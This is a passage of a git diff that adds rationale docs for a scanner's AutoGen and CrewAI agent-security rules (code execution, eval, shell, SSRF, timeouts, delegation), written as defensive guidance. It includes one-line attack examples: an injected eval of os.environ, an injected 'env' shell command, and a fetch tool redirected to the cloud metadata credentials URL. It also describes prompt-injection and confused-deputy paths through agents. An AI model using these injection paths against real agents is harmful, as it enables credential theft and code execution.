0.7:** a deployment that bounds the loop another way (an external +turn limit, a custom reply handler) is over-flagged, since the rule sees only the +constructor. 
+ +--- + +## What this policy does not cover + +- Code execution wired by hand inside a tool body rather than via an executor — + caught by **AG2-010** (code_execution.md), not here. +- Whether the agent's input is actually reachable by untrusted content. All five + rules flag a configuration, not a proven injection path. +- AG2-005 cannot tell whether the assistant's configured executor is itself + hardened (Docker, human review) — it flags the boundary collapse regardless. +- Loop bounds enforced outside the constructor (an external timeout, a custom + speaker-selection or reply handler) are invisible to AG2-004 / AG2-006. +- The newer `autogen-agentchat` (v0.4+) API surface and its + `CodeExecutorAgent` / executor classes are matched only insofar as discovery + normalizes them to these agent kinds; configs expressed through a different + shape may be missed. + +--- + +## Recommendations beyond the fix + +```python +from autogen import AssistantAgent, UserProxyAgent + +# AutoGen's recommended split: the assistant only generates; a Dockered, +# human-gated, bounded executor runs the code. +assistant = AssistantAgent( + name="coder", + llm_config={...}, + code_execution_config=False, # generation only +) + +executor = UserProxyAgent( + name="executor", + human_input_mode="ALWAYS", # a human approves each run + max_consecutive_auto_reply=3, # bounded auto-reply loop + code_execution_config={"use_docker": True, "work_dir": "sandbox"}, +) +``` + +1. Keep generation and execution in separate agents; never set + `code_execution_config` on the `AssistantAgent`. +2. Run all generated code in Docker (`use_docker=True`) and require human review + (`human_input_mode="ALWAYS"` or `"TERMINATE"`) on the executor. +3. Bound every loop: set `max_consecutive_auto_reply` on executors and + `max_round` on group chats, sized to the workflow, paired with a clear + termination condition so the chat ends on success. +4. 
If unattended execution is a hard requirement, run the code in a hardened + external sandbox with no host access rather than via the AutoGen executor. diff --git a/docs/Policy/autogen/code_execution.md b/docs/Policy/autogen/code_execution.md new file mode 100644 index 0000000..668f1ee --- /dev/null +++ b/docs/Policy/autogen/code_execution.md @@ -0,0 +1,123 @@ +--- +policy_id: autogen_code_execution +category: autogen +topic: code_execution +rules: + - id: AG2-010 + severity: high + confidence: 0.85 + scope: tool + fix_type: code +references: [LLM05] +--- + +# Policy Rationale: AutoGen Code-Execution Safety + +**Policy ID:** `autogen_code_execution` +**File:** `autogen/code_execution.yaml` +**Rules:** AG2-010 +**Severities:** high +**Fix types:** code +**References:** LLM05 (Improper Output Handling) + +--- + +## What this policy covers + +AutoGen tool functions whose body evaluates code at runtime. **AG2-010** fires +when a tool registered with an agent (via `register_function` or the +`register_for_llm` / `register_for_execution` decorators) calls the bare `eval`, +`exec`, or `compile` builtin (predicate `has_code_exec_call`, a bare-builtin AST +match — `re.compile` and other attribute calls do not fire). + +--- + +## Why dynamic code execution is a distinct concern in AutoGen tools + +A registered AutoGen tool is exposed to the model, so the model writes or steers +any string the tool evaluates. With any model-influenced input, +`eval`/`exec`/`compile` is arbitrary code execution inside the agent process — +no OS sandbox stands between the call and the runtime's imports, file handles, +and in-memory credentials. The blast radius is the whole process: one evaluated +string can read `os.environ`, touch any file the process can reach, or spawn a +subprocess. + +The AutoGen-specific sharpening: this is the same arbitrary-execution risk +AutoGen's code *executor* carries, but reached inside an ordinary tool rather +than through the executor. 
AutoGen's documentation strongly recommends running +generated code inside Docker; a hand-rolled `eval`/`exec` in a tool body bypasses +that entirely — it runs in-process with none of the executor's container +isolation, and it hides inside a function that looks like any other tool. So the +mitigation AutoGen built (the Docker executor) is sidestepped exactly when a +developer reaches for `eval` for convenience. + +--- + +## Rule-by-rule defense + +### AG2-010 — Tool body evaluates dynamic code (Severity: high, Confidence: 0.85, Fix type: code) + +**What we detect:** an AutoGen-registered tool whose body calls the bare `eval`, +`exec`, or `compile` builtin (predicate `has_code_exec_call`, an AST callee +match, not a substring scan). + +**Why it is flaggable:** dynamic evaluation in a model-callable tool is an +arbitrary-code-execution surface whenever any part of the evaluated string +originates with the model. The presence of the primitive is the signal. + +**Real-world consequence:** a `calc(expr)` tool implemented as `return eval(expr)` +is driven by an injected instruction into `__import__('os').environ` to read +secrets, or into reading/writing files the process can touch. + +**Why severity is high and not critical:** no in-band sandbox stands between the +call and the full runtime, so the only reliable fix is removing dynamic +evaluation; it is not raised to critical because the engine reserves that tier and +the exposure depends on whether the evaluated string is actually model-influenced. +**Fix type — code:** removing `eval`/`exec`/`compile` is a tool-source edit. +**Confidence 0.85:** the bare-callee match avoids the `re.compile` false positive, +but a dynamic-eval helper in another module, or evaluation via +`types.FunctionType` / `marshal` / `pickle.loads`, escapes the body-only walk. 
+ +--- + +## What this policy does not cover + +- AutoGen's code *executor* configuration (Docker, human review) — that is the + agent-scope concern of **AG2-001 / AG2-002** (agent_safety.md), not a tool + rule. +- Dynamic evaluation reached through a helper in another module — the walk sees + only the tool body. +- Alternative dynamic-code primitives: `types.FunctionType`, `marshal.loads`, + `pickle.loads`, `importlib`-driven loading. +- Evaluations whose argument is provably a constant literal still fire — the + predicate flags the presence of the primitive, not proof of model-control. + +--- + +## Recommendations beyond the fix + +```python +import ast +from autogen import register_function + +def safe_calc(expr: str) -> str: + """Evaluate a constant arithmetic expression; runs no arbitrary code.""" + node = ast.parse(expr, mode="eval") + allowed = (ast.Expression, ast.BinOp, ast.UnaryOp, ast.Constant, + ast.operator, ast.unaryop) + if not all(isinstance(n, allowed) for n in ast.walk(node)): + return "error: disallowed syntax" + return str(eval(compile(node, "", "eval"))) # literals only + +register_function(safe_calc, caller=assistant, executor=executor, + description="Evaluate a constant arithmetic expression.") +``` + +1. Remove `eval`/`exec`/`compile` from agent-callable tool bodies. For data math + prefer `ast.literal_eval`; reserve a constrained AST walk for arithmetic. +2. If running code is genuinely the product, route it through AutoGen's Docker + code executor or a locked-down external sandbox (no filesystem, no network, + hard timeout) rather than in-process evaluation. +3. Keep application secrets out of the process that hosts any evaluation-capable + tool — assume an evaluated string can read the whole environment. +4. Log every evaluation with the session ID and the model that requested it. 
diff --git a/docs/Policy/autogen/network.md b/docs/Policy/autogen/network.md new file mode 100644 index 0000000..3bfe290 --- /dev/null +++ b/docs/Policy/autogen/network.md @@ -0,0 +1,119 @@ +--- +policy_id: autogen_network +category: autogen +topic: network +rules: + - id: AG2-012 + severity: medium + confidence: 0.8 + scope: tool + fix_type: code +references: [LLM10] +--- + +# Policy Rationale: AutoGen Tool Network Hygiene + +**Policy ID:** `autogen_network` +**File:** `autogen/network.yaml` +**Rules:** AG2-012 +**Severities:** medium +**Fix types:** code +**References:** LLM10 (Unbounded Consumption) + +--- + +## What this policy covers + +Network-call hygiene inside AutoGen tool functions. **AG2-012** uses the +`call_without_kwarg` predicate: it fires when the tool body calls one of the +`requests.*` or `httpx.*` request functions (`get`, `post`, `put`, `delete`, +`patch`, `head`, `request`) without a `timeout=` keyword argument. A call that +already passes `timeout=` does not fire. + +--- + +## Why a missing timeout is a distinct concern in AutoGen tools + +A `requests.get(url)` with no `timeout` blocks until the remote responds or the +connection dies — which, against a slow or hostile server, can be forever. +AutoGen has no tool-level timeout to rescue it: the tool call runs inside the +agent conversation loop, so a hung request stalls the entire agent until the +socket eventually gives up. Under load this exhausts whatever runtime hosts the +agent — threads, connections, the event loop — and the failure never surfaces to +the model, so the agent simply appears to freeze. That is the Unbounded +Consumption (LLM10) failure mode: a single unresponsive endpoint ties up the +agent indefinitely with no upper bound on the wait. In a multi-agent group chat +the stall is worse: one hung tool call can block the whole conversation, not just +one turn. 
+ +--- + +## Rule-by-rule defense + +### AG2-012 — Tool network call has no timeout (Severity: medium, Confidence: 0.8, Fix type: code) + +**What we detect:** an AutoGen tool body that calls a `requests.*` / `httpx.*` +request function with no `timeout=` keyword (predicate `call_without_kwarg`). + +**Why it is flaggable:** without a timeout the request can hang indefinitely, and +AutoGen has no tool-level timeout — the hung call blocks the agent loop until the +socket dies. + +**Real-world consequence:** a `fetch_report(url)` tool calls `requests.get(url)` +with no timeout; a slow upstream makes the agent hang for minutes per call, and +under concurrent load the host runs out of connections while every agent waits. + +**Why severity is medium and not high:** the impact is an availability/cost +incident, not a compromise — recoverable, and only triggered by a slow or +unresponsive remote rather than on every call. **Fix type — code:** adding +`timeout=` is a tool-source edit. **Confidence 0.8:** the rule looks for the +`timeout` kwarg on the recognized callees, so it over-fires when a timeout is set +another way (a session-level default, an `httpx.Client(timeout=...)` the call +inherits) and under-fires on request libraries outside the recognized +`requests`/`httpx` set (`urllib`, `aiohttp`, a custom client). + +--- + +## What this policy does not cover + +- Request libraries other than `requests` / `httpx` — `urllib.request`, + `aiohttp`, `urllib3`, or a bespoke HTTP client are not in the recognized callee + set. +- A timeout set through a mechanism other than the per-call `timeout=` kwarg — a + `requests.Session` default, an `httpx.Client(timeout=...)` the call inherits, + or a socket-level default — the rule cannot see it and fires anyway. +- Whether the chosen timeout value is *appropriate*. A call with `timeout=600` + satisfies the rule but still hangs the agent for ten minutes. 
+- Retries, connection-pool exhaustion, and other resource limits beyond the + single request timeout. + +--- + +## Recommendations beyond the fix + +```python +import requests +from autogen import register_function + +def fetch_report(report_id: str) -> str: + """Fetch a report by ID from the vetted host with a tight timeout.""" + resp = requests.get( + f"https://api.example.com/reports/{report_id}", + timeout=10, # fail fast on a slow remote + ) + resp.raise_for_status() + return resp.text + +register_function(fetch_report, caller=assistant, executor=executor, + description="Fetch a report by ID.") +``` + +1. Pass `timeout=` (typically 5–30 seconds) to every request, sized tight enough + to fail fast and loose enough for legitimate slow responses on that endpoint. +2. Prefer a configured client (`httpx.Client(timeout=...)`) so a default applies + even where a per-call value is forgotten — but keep an explicit per-call + timeout on slow endpoints. +3. Surface failures as a structured error the model can react to (retry, fall + back, report) rather than letting the call hang. +4. Add retry-with-backoff and a circuit breaker for endpoints the agent depends + on, so a flaky remote degrades gracefully instead of stalling the loop. diff --git a/docs/Policy/autogen/repo_hygiene.md b/docs/Policy/autogen/repo_hygiene.md new file mode 100644 index 0000000..9d95d39 --- /dev/null +++ b/docs/Policy/autogen/repo_hygiene.md @@ -0,0 +1,119 @@ +--- +policy_id: autogen_repo_hygiene +category: autogen +topic: repo_hygiene +rules: + - id: AG2-201 + severity: low + confidence: 0.9 + scope: repo + fix_type: config +references: [LLM06] +--- + +# Policy Rationale: AutoGen Repo Hygiene + +**Policy ID:** `autogen_repo_hygiene` +**File:** `autogen/repo_hygiene.yaml` +**Rules:** AG2-201 +**Severities:** low +**Fix types:** config +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +A single repo-scope rule that fires once per scan. 
**AG2-201** fires when the +repo uses AutoGen in code (predicate `repo_has_sdk_in_code` for `autogen`) but +ships no agent-guidance doc — neither `AGENTS.md` nor `CLAUDE.md` is present as a +discovered repo component (predicate `repo_component_present`, negated). It reads +the scan inventory, not any single file. + +--- + +## Why a missing agent-guidance doc is a distinct concern for AutoGen projects + +`AGENTS.md` is the cross-vendor convention an editing coding agent reads before it +acts on a repository. When neither it nor a `CLAUDE.md` is present, any agent that +opens this repo has no project-specific guidance on how its agents and tools must +be configured. For an AutoGen project specifically, that means nothing in-tree +tells the agent whether code execution is permitted, whether the executor must run +in Docker, whether `human_input_mode` may be set to `NEVER`, and what the local +test and build commands are. The likely consequence is generated code that +violates the project's own safety contract — an agent wiring an executor with +`use_docker=False` or `human_input_mode="NEVER"` because nothing taught it the +local rules. This is a soft, preventive form of excessive-agency risk (LLM06): +the guardrail that should constrain an editing agent's choices is absent, so the +agent operates with more latitude than the maintainers intend. + +--- + +## Rule-by-rule defense + +### AG2-201 — Project ships no agent-guidance doc (Severity: low, Confidence: 0.9, Fix type: config) + +**What we detect:** a repo that uses AutoGen in code but has neither `AGENTS.md` +nor `CLAUDE.md` at the root (predicates `repo_has_sdk_in_code` + `not +repo_component_present`). + +**Why it is flaggable:** without an in-tree guidance doc, an editing agent has no +project-specific rules to follow and will reproduce unsafe patterns the +maintainers would reject. 
+ +**Real-world consequence:** a developer asks a coding agent to "add an executor +that runs the generated scripts"; with no `AGENTS.md` stating Docker is required, +the agent writes `code_execution_config={"use_docker": False}` — exactly the +pattern AG2-001 flags. + +**Why severity is low and not medium:** the absence of the doc causes no harm by +itself; it only raises the probability that *other* defects get introduced, so it +is a preventive nudge rather than a live vulnerability. **Fix type — config:** the +fix is adding a documentation file at the repo root — no application or tool code +changes. **Confidence 0.9:** presence of `AGENTS.md` / `CLAUDE.md` is an +unambiguous inventory check; the small gap covers projects that document agent +guidance somewhere the component scan does not recognize. + +--- + +## What this policy does not cover + +- The *content* or *quality* of an `AGENTS.md`. An empty or stale file satisfies + the rule; the rule checks presence, not whether the guidance is correct or + followed. +- Guidance kept somewhere other than a root `AGENTS.md` / `CLAUDE.md` — a wiki, a + `CONTRIBUTING.md`, or a nested per-package doc — counts as absent. +- Whether any agent actually reads the doc. The rule cannot verify that an + editing agent honors the guidance. +- It is a repo-scope nudge, not a per-agent or per-tool check — it says nothing + about the safety of any individual agent or tool in the repo. + +--- + +## Recommendations beyond the fix + +```markdown + +# Agent guidance + +## Safety rules +- Code execution must run in Docker (`use_docker=True`) and is never enabled on + an `AssistantAgent` — route it through the executor proxy only. +- `human_input_mode="NEVER"` is forbidden on any code-executing agent. +- Group chats set `max_round`; executors set `max_consecutive_auto_reply`. +- Tools must not shell out or fetch model-supplied URLs without the net guard. 
+ +## Commands +- Test: `pytest` +- Lint: `ruff check .` +- Build: `make build` +``` + +1. Add an `AGENTS.md` at the repo root (a `CLAUDE.md` also satisfies the rule). +2. State whether code execution is permitted and under what guard (Docker, + `human_input_mode`), how tools must be registered and constrained, and any + required human-in-the-loop gates. +3. List the exact test, lint, and build commands so an editing agent can verify + its own changes. +4. Keep it short and concrete, and keep it current as the safety contract + evolves. diff --git a/docs/Policy/autogen/shell_safety.md b/docs/Policy/autogen/shell_safety.md new file mode 100644 index 0000000..2867c54 --- /dev/null +++ b/docs/Policy/autogen/shell_safety.md @@ -0,0 +1,120 @@ +--- +policy_id: autogen_shell_safety +category: autogen +topic: shell_safety +rules: + - id: AG2-009 + severity: high + confidence: 0.85 + scope: tool + fix_type: code +references: [LLM05] +--- + +# Policy Rationale: AutoGen Shell-Execution Safety + +**Policy ID:** `autogen_shell_safety` +**File:** `autogen/shell_safety.yaml` +**Rules:** AG2-009 +**Severities:** high +**Fix types:** code +**References:** LLM05 (Improper Output Handling) + +--- + +## What this policy covers + +AutoGen tool function bodies that spawn an OS process. **AG2-009** uses the +structured `has_shell_call` predicate: it walks the function's AST and fires on +any call whose resolved callee is `os.system`, `os.popen`, a `subprocess.*` +member (`subprocess.run`, `.Popen`, `.call`, `.check_output`, `.check_call`, …), +or an `os.spawn*` member. Because it matches the resolved callee, a +`subprocess.run(` in a comment or docstring does not fire. + +--- + +## Why shell execution is a distinct concern in AutoGen tools + +A registered AutoGen tool is exposed to the model, and the model writes or selects +the command the tool runs. 
Shell execution selected by model output is the most +direct path from prompt injection to remote code execution: the subprocess +inherits the agent process's working directory, environment variables (including +API keys), filesystem credentials, and outbound network. A single injected +instruction that reaches the shell runs with the agent's full privileges. + +The AutoGen-specific angle is that AutoGen already provides a *bounded* way to run +commands — the code executor, which AutoGen's docs insist should run in Docker. A +hand-rolled `subprocess.run(cmd, shell=True)` inside a tool sidesteps that +boundary completely: it runs in-process with no container, and it hides inside an +ordinary-looking tool the executor's safety settings never touch. So the tool body +is the shell surface a reviewer must inspect, because none of AutoGen's +executor-level controls apply to it. + +--- + +## Rule-by-rule defense + +### AG2-009 — Tool body spawns a subprocess (Severity: high, Confidence: 0.85, Fix type: code) + +**What we detect:** an AutoGen-registered tool whose body invokes `os.system`, +`os.popen`, a `subprocess.*` function, or an `os.spawn*` function (predicate +`has_shell_call`, an AST callee walk, not a substring scan). + +**Why it is flaggable:** process spawn from a model-callable tool puts the OS +shell on the model's tool surface. The presence of the spawn is the signal; every +safeguard is bolted onto an inherently broad primitive. + +**Real-world consequence:** a `run(cmd)` tool forwarding a model string into +`subprocess.run(cmd, shell=True)` is one prompt injection from arbitrary command +execution — an injected `cmd="env"` exfiltrates the process environment, API keys +included. + +**Why severity is high and not critical:** the fix usually means removing the +spawn or rearchitecting behind a typed API; it is not raised above high because +the exposure depends on what the caller does with the spawn, and the engine +reserves critical for unconditional RCE. 
**Fix type — code:** replacing the spawn +(or fronting it with an allow-list) is a tool-source edit. **Confidence 0.85:** +the `subprocess.*` prefix over-fires on the rare non-spawning helper +(`subprocess.list2cmdline`), and async/`pty` spawn primitives escape the body +walk. + +--- + +## What this policy does not cover + +- `asyncio.create_subprocess_exec` / `asyncio.create_subprocess_shell`, + `pty.spawn`, `pexpect.spawn`, `multiprocessing.Process`, and the `os.exec*` + family — none are in the matched callee set. +- A spawn wrapped behind a helper defined in another module — the rule scans the + tool body only. +- Whether the spawned command is safe. A literal `subprocess.run(["ls", "/tmp"], + shell=False)` fires even though it is comparatively benign. +- AutoGen's own code executor and its Docker configuration — that is an + agent-scope concern (AG2-001), not a tool rule. + +--- + +## Recommendations beyond the fix + +```python +import shutil +from autogen import register_function + +def disk_usage(path: str) -> str: + """Return free/used disk space for the volume containing `path`.""" + u = shutil.disk_usage(path) + return f"total={u.total} used={u.used} free={u.free}" + +register_function(disk_usage, caller=assistant, executor=executor, + description="Report disk usage for a path.") +``` + +1. Replace shell-outs with a typed library call wherever one exists + (`shutil`, `pathlib`, an SDK client). +2. If a subprocess is genuinely unavoidable, build the argv list explicitly and + pass `shell=False`; never interpolate model strings into a `shell=True` + command. Allow-list the exact commands permitted. +3. Always pass `timeout=` — a model can request an infinitely-running command. +4. Run the agent in a sandbox with dropped capabilities and a network egress + allow-list; drop sensitive env vars from the subprocess. Keep shell logic out + of any agent-callable tool and log every spawned command for audit. 
diff --git a/docs/Policy/autogen/ssrf.md b/docs/Policy/autogen/ssrf.md new file mode 100644 index 0000000..afe2f68 --- /dev/null +++ b/docs/Policy/autogen/ssrf.md @@ -0,0 +1,128 @@ +--- +policy_id: autogen_ssrf +category: autogen +topic: ssrf +rules: + - id: AG2-011 + severity: high + confidence: 0.8 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: AutoGen SSRF Safety + +**Policy ID:** `autogen_ssrf` +**File:** `autogen/ssrf.yaml` +**Rules:** AG2-011 +**Severities:** high +**Fix types:** code +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +AutoGen tool function bodies that issue an outbound HTTP request to a non-literal +URL. **AG2-011** uses the `has_dynamic_url_call` predicate: a request call +(`requests.*`, `httpx.*`, `urllib`, an aiohttp session, …) whose URL argument is +built from a parameter, an f-string, or a concatenation rather than a fixed +string literal. A request to a hard-coded constant URL does not fire. + +--- + +## Why SSRF is a distinct concern in AutoGen tools + +When the request URL is a literal, the developer chose the destination. When it +is built from a tool argument, the *model* chooses the destination at call time — +and in an AutoGen agent the model's choices are reachable by prompt injection. A +server-side request originates from inside the agent's network, so it can reach +things an external caller cannot: internal services on private CIDRs, localhost +admin ports, and the cloud metadata endpoint (169.254.169.254) that hands out +short-lived IAM credentials. A single injected instruction that redirects the +fetch to the metadata endpoint exfiltrates those credentials through the model's +next output. + +There is a second-order hazard specific to agents: whatever the tool fetches +re-enters the conversation as text the model reads, so an attacker who controls +the fetched page controls a fresh prompt-injection channel into the agent. 
The +SSRF primitive is therefore both an outbound credential-theft path and an inbound +injection path at once — excessive agency (LLM06) even when the developer never +intended the tool to reach internal hosts. + +--- + +## Rule-by-rule defense + +### AG2-011 — Tool fetches a caller-controlled URL (Severity: high, Confidence: 0.8, Fix type: code) + +**What we detect:** an AutoGen tool body that issues an HTTP request whose URL is +non-literal — built from a parameter or interpolated value (predicate +`has_dynamic_url_call`). + +**Why it is flaggable:** a model-controlled request target lets a prompt injection +point the request at internal services or the metadata endpoint, and feeds the +response back into the conversation as untrusted text. + +**Real-world consequence:** a `fetch(url)` tool calling `requests.get(url)` is +injected with `url="http://169.254.169.254/latest/meta-data/iam/security-credentials/role"`; +the returned credentials are exfiltrated through the model's next reply. + +**Why severity is high and not critical:** SSRF is serious but its blast radius +depends on the host's network position (a host with no reachable internal +services or metadata endpoint gives an attacker far less); it is not the +unconditional code execution the engine reserves critical for. **Fix type — +code:** constraining or +hard-coding the destination is an edit to the tool body. **Confidence 0.8:** the +predicate flags a non-literal URL, so it over-fires when the dynamic part is +already validated against an allow-list inside the body (the rule cannot see the +guard), and under-fires when the URL is assembled in a helper in another module. + +--- + +## What this policy does not cover + +- A request whose URL is dynamic but already validated against an allow-list + inside the tool body — the rule cannot see the guard, so it fires anyway (a + known false positive). +- A fetch assembled in a helper in another module — the body-only walk misses it. 
+- DNS-rebinding and time-of-check/time-of-use attacks against an allow-list that + validates the hostname but not the resolved IP. Defeating those requires + re-checking the resolved address. +- Exfiltration or internal access through non-HTTP primitives (raw sockets, DNS, + SMTP) belongs to other concerns. +- Missing-timeout on the same request is a separate reliability rule + (**AG2-012**, network.md). + +--- + +## Recommendations beyond the fix + +```python +import ipaddress, socket +from urllib.parse import urlparse +import requests + +ALLOWED_HOSTS = {"api.example.com"} + +def get_status(path: str) -> str: + """Fetch a status path from the vetted API host only.""" + url = f"https://api.example.com/{path.lstrip('/')}" # host is fixed + host = urlparse(url).hostname + if host not in ALLOWED_HOSTS: + return "error: host not allowed" + ip = ipaddress.ip_address(socket.gethostbyname(host)) + if ip.is_private or ip.is_loopback or ip.is_link_local: + return "error: resolves to a non-public address" + return requests.get(url, timeout=10).text +``` + +1. If the tool only ever talks to one service, hard-code the base URL and accept + only a path or query from the model — never a full URL. +2. When a host must be dynamic, validate it against an allow-list, resolve the + hostname, and re-check the resolved IP against private / loopback / link-local + ranges. To defeat DNS rebinding, connect to the address that was checked — + if the HTTP client resolves the name again (as `requests.get(url)` does in the + sketch above), the second lookup can return a different, internal address. +3. Disable or constrain redirect following so a 302 cannot bounce the request + into an internal address, and always pass `timeout=`. +4. Treat the fetched body as untrusted — keep it out of the system prompt and do + not let it expand the agent's permissions. 
diff --git a/docs/Policy/autogen/tool_definition.md b/docs/Policy/autogen/tool_definition.md new file mode 100644 index 0000000..a85df60 --- /dev/null +++ b/docs/Policy/autogen/tool_definition.md @@ -0,0 +1,149 @@ +--- +policy_id: autogen_tool_definition +category: autogen +topic: tool_definition +rules: + - id: AG2-007 + severity: low + confidence: 0.9 + scope: tool + fix_type: code + - id: AG2-008 + severity: medium + confidence: 0.85 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: AutoGen Tool Definition Hygiene + +**Policy ID:** `autogen_tool_definition` +**File:** `autogen/tool_definition.yaml` +**Rules:** AG2-007, AG2-008 +**Severities:** low, medium +**Fix types:** code, code +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +Authoring hygiene for AutoGen tools registered via `register_function` or the +`register_for_llm` / `register_for_execution` decorators. **AG2-007** fires when +the registered function has no docstring (predicate `has_docstring: false`). +**AG2-008** fires when the function takes parameters but none carry type +annotations (predicates `has_params: true` AND `has_typed_params: false`). +AutoGen turns the function's docstring into the tool's description and its type +hints into the argument schema the model sees. + +--- + +## Why definition quality is a distinct concern in AutoGen tools + +The model never sees an AutoGen tool's implementation — only the description and +argument schema AutoGen derives from the registered function. It selects which +tool to call and what arguments to pass from that derived surface. A tool with +neither a docstring nor an explicit `description=` reaches the model as a bare +name: it cannot tell what the tool does or when to call it, so it skips the tool +or invokes it with the wrong arguments. 
A tool with untyped parameters produces +an underspecified schema: the model gets no type guidance, emits arguments of the +wrong shape, and the SDK rejects them at validation time — a silent reliability +tax on every call. There is an excessive-agency edge too (LLM06): an +underspecified schema widens the tool's input surface, so wrong-shaped +model-supplied values that slip past validation reach the registered function in +forms the author never anticipated. The gap is not a remote-execution hole but a +degradation of the contract the model routes against, and it compounds across a +multi-agent conversation that burns turns re-issuing mis-shaped calls. + +--- + +## Rule-by-rule defense + +### AG2-007 — Tool has no description (Severity: low, Confidence: 0.9, Fix type: code) + +**What we detect:** a registered tool function with no docstring (predicate +`has_docstring`). + +**Why it is flaggable:** AutoGen derives the tool's description from the +docstring (unless an explicit `description=` is passed at registration); with +neither, the tool is a bare name the model cannot reason about. + +**Real-world consequence:** a `lookup` tool with no docstring is never selected +when the user asks a question it could answer, or is called with a nonsense +argument because the model is guessing at its purpose. + +**Why severity is low and not medium:** it is a routing-quality defect with no +direct security impact, and the failure mode (a skipped or mis-called tool) is +visible and recoverable. **Fix type — code:** adding a docstring (or a +`description=`) is an authoring change to the tool. **Confidence 0.9:** docstring +presence is unambiguous; the small gap is that a tool registered with an explicit +`description=` but no docstring may still be flagged by the docstring-only +predicate — a possible false positive the number accounts for. 
+ +### AG2-008 — Tool parameters are not type-annotated (Severity: medium, Confidence: 0.85, Fix type: code) + +**What we detect:** a registered tool function that has parameters but no type +annotations on any of them (predicates `has_params` + `not has_typed_params`). + +**Why it is flaggable:** AutoGen builds the argument schema from the type hints; +without them the model gets no shape guidance and emits wrongly-typed arguments +that fail validation. + +**Real-world consequence:** a `book_meeting(start, attendees)` tool with untyped +params lets the model pass `start="next tuesdayish"`; the SDK rejects it, the call +retries, and turns are wasted before it succeeds — or it silently coerces to the +wrong value. + +**Why severity is medium and not low:** unlike a missing description, a +mis-shaped argument can reach the executor with the wrong value and cause an +incorrect action, not just a skipped call — so the impact exceeds AG2-007. **Fix +type — code:** annotating parameters is a source edit. **Confidence 0.85:** the +rule fires only when *no* parameter is typed, so a partially-typed tool is a false +negative, and `typing.Annotated` descriptions count as types so they correctly +suppress. + +--- + +## What this policy does not cover + +- A tool registered with an explicit `description=` argument satisfies the *intent* + of AG2-007, but the docstring-only predicate may still fire — verify the + description is set rather than only adding a docstring. +- A *partially* typed tool (some parameters annotated, some not) does not fire — + AG2-008 requires that no parameter carries a type. +- The *quality* of a docstring or a type: a one-word docstring or a bare `dict` + annotation satisfies the rules but barely helps the model. +- Whether the schema the model sees actually matches the tool's real behavior — a + misleading-but-present docstring passes. 
+ +--- + +## Recommendations beyond the fix + +```python +from typing import Annotated +from autogen import register_function + +def book_meeting( + start_iso: Annotated[str, "Start time, ISO 8601, e.g. 2026-01-02T15:00:00Z"], + attendees: Annotated[list[str], "Attendee email addresses"], +) -> str: + """Book a meeting and return the calendar event ID.""" + ... + +register_function( + book_meeting, caller=assistant, executor=executor, + description="Book a meeting at a given time with a list of attendees.", +) +``` + +1. Give every tool a docstring written for the model — or pass an explicit + `description=` at registration — stating what it does, its inputs, and its + return value. +2. Annotate every parameter with a concrete type; `typing.Annotated[T, "desc"]` + adds a per-parameter description AutoGen forwards to the model. +3. Use an `Enum` or `Literal` for closed-set arguments so the model cannot emit + an out-of-range value. +4. Keep the description and the implementation in sync — an overstated docstring + is its own correctness hazard. 
diff --git a/docs/Policy/crewai/agent_safety.md b/docs/Policy/crewai/agent_safety.md new file mode 100644 index 0000000..b83c996 --- /dev/null +++ b/docs/Policy/crewai/agent_safety.md @@ -0,0 +1,190 @@ +--- +policy_id: crewai_agent_safety +category: crewai +topic: agent_safety +rules: + - id: CREW-101 + severity: high + confidence: 0.9 + scope: agent + fix_type: config + - id: CREW-102 + severity: high + confidence: 0.9 + scope: agent + fix_type: config + - id: CREW-104 + severity: medium + confidence: 0.75 + scope: agent + fix_type: config +references: [LLM05, LLM06] +--- + +# Policy Rationale: CrewAI Agent Safety + +**Policy ID:** `crewai_agent_safety` +**File:** `crewai/agent_safety.yaml` +**Rules:** CREW-101, CREW-102, CREW-104 +**Severities:** high, high, medium +**Fix types:** config, config, config +**References:** LLM05 (Improper Output Handling), LLM06 (Excessive Agency) + +--- + +## What this policy covers + +Agent-scope rules for the CrewAI `Agent(...)` constructor (normalized class +`crewai_agent`). They read three constructor kwargs that hand the model +execution or delegation reach: `allow_code_execution=True` (CREW-101), +`code_execution_mode="unsafe"` (CREW-102), and `allow_delegation=True` +(CREW-104). Each is matched by the `agent_kwarg_value` predicate against the +literal value in the constructor call, so the rule fires on the declaration +itself, not on any downstream use. + +--- + +## Why agent configuration is a distinct concern in CrewAI + +CrewAI's `Agent` constructor is where capability is granted, and two of its +kwargs grant the single most dangerous capability — running model-generated +code. `allow_code_execution=True` makes CrewAI auto-inject a +`CodeInterpreterTool` into the agent's tool set; from that point the model can +run arbitrary Python it generates. 
Because the agent's instructions, the tool +outputs it consumes, and any content it retrieves are all model-reachable, a +single prompt injection has a direct path from text to code execution. This is +not a hypothetical: it is the entry point of CrewAI's published RCE chain — +CVE-2026-2275 escapes the SandboxPython interpreter via a `ctypes` call, and +CVE-2026-2287 silently falls back from the Docker sandbox to host execution +when Docker is unavailable. `code_execution_mode="unsafe"` is worse still: it +removes the container boundary entirely and runs model code directly on the +host, so there is nothing left to escape. + +Delegation (CREW-104) is a different shape of the same excessive-agency +problem. An agent with `allow_delegation=True` can hand work to any peer in the +crew and invoke that peer's tools, so its effective trust boundary becomes the +union of every reachable peer's capabilities — with no per-delegation gate. +This is a textbook confused-deputy setup: if any peer holds the code +interpreter or an unconstrained file reader, a prompt injection against this +agent can reach that capability indirectly, even though this agent was never +granted it directly. In an agent crew the attacker does not need to compromise +the powerful agent; it only needs to compromise one that can delegate to it. + +--- + +## Rule-by-rule defense + +### CREW-101 — Agent enables built-in code execution (Severity: high, Confidence: 0.9, Fix type: config) + +**What we detect:** an `Agent(...)` call with `allow_code_execution=True` +(predicate `agent_kwarg_value`). + +**Why it is flaggable:** the flag makes CrewAI inject a `CodeInterpreterTool`, +putting model-generated Python on the agent's tool surface. The capability is +the defect — every safeguard is bolted onto an interpreter the model can drive. +This flag is the documented entry point of CVE-2026-2275 / CVE-2026-2287, and it +is deprecated upstream. 
